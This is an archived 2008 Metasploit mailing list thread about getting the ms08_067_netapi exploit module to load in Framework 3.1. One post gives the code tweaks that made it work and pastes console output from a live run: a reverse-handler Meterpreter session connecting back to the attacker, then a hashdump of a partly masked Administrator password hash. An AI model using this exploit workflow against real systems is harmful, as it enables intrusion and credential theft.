Metasploit mailing list archives
ms08_067_netapi.rb issue on 3.1 framework Win GUI
From: soporte at gmail.com (Carlos Tori)
Date: Thu, 30 Oct 2008 13:40:17 -0300
Dear Moore, the exploit works fine in my 3.1 (over XPSP3 - MSF revision 5804)... GUI, console, and console with meterpreter/payload. Just adding the following lines: (line 15) module Msf (line 17) class Exploits::Windows::Smb::MS08_067_NETAPI < Msf::Exploit::Remote (line 215) end :) GUI output: 14:10:06 - Initialized the Metasploit Framework GUI. 14:10:29 - ms08_067_netapi [*] Launching exploit windows/smb/ms08_067_netapi... 14:10:30 - ms08_067_netapi [*] Started reverse handler 14:10:30 - ms08_067_netapi [*] Connecting to the target... 14:10:33 - ms08_067_netapi [*] Binding to 4b324fc8-1670-01d3-1278-5a47---188:3.0 at ncacn_np:190.**.**.**[\BROWSER] ... 14:10:34 - ms08_067_netapi [*] Bound to 4b324fc8-1670-01d3-1278-5a47---188:3.0 at ncacn_np:190.**.**.**[\BROWSER] ... 14:10:34 - ms08_067_netapi [*] Triggering the vulnerability... 14:10:35 - ms08_067_netapi [*] Transmitting intermediate stager for over-sized stage...(89 bytes) 14:10:37 - ms08_067_netapi [*] Sending stage (2834 bytes) 14:10:37 - ms08_067_netapi [*] Sleeping before handling stage... 14:10:38 - ms08_067_netapi [*] Uploading DLL (81931 bytes)... 14:10:43 - ms08_067_netapi [*] Upload completed. 14:10:00 - [*] Session 1 created for 190.***.***.***:1605 Console: msf > sessions -l Active sessions =============== Id Description Tunnel -- ----------- ------ 1 Meterpreter 200.***.***.***:4444 -> 190.***.***.***:1605 msf > sessions -i 1 [*] Starting interaction with 1... use priv Loading extension priv...success. hashdump Administrador:500:aad3b435b51404ee*************:b744f22a1320c************::: Thanks to Ulises2k for the spanish ret. Best regards to all. Carlos Tori PGP ID 0x7F81D818 2008/10/30 H D Moore <hdm at metasploit.com>:
The exploit is not compatible with 3.1, you need to be using 3.2-testing, which requires some manual tweaking for Windows users. I added a Wiki page which covers how to do this: http://metasploit.com/dev/trac/wiki/Metasploit/Windows/Upgrade_to_SVN On Thursday 30 October 2008, Kishan wrote:I copied the downloaded ms08_067_netapi.rb file to exploits/windows/smb directory. Also did the update via SVN SVN co http://metasploit.com/svn/framework3...xploits/windows No matter what I do , the framework does not show me the exploit which I can be used. No errors. What am I doing wrong ?_______________________________________________ http://spool.metasploit.com/mailman/listinfo/framework
Current thread:
- ms08_067_netapi.rb issue on 3.1 framework Win GUI Kishan (Oct 30)
- ms08_067_netapi.rb issue on 3.1 framework Win GUI H D Moore (Oct 30)
- ms08_067_netapi.rb issue on 3.1 framework Win GUI Carlos Tori (Oct 30)
- ms08_067_netapi.rb issue on 3.1 framework Win GUI H D Moore (Oct 30)
- ms08_067_netapi.rb issue on 3.1 framework Win GUI Carlos Tori (Oct 30)
- ms08_067_netapi.rb issue on 3.1 framework Win GUI H D Moore (Oct 30)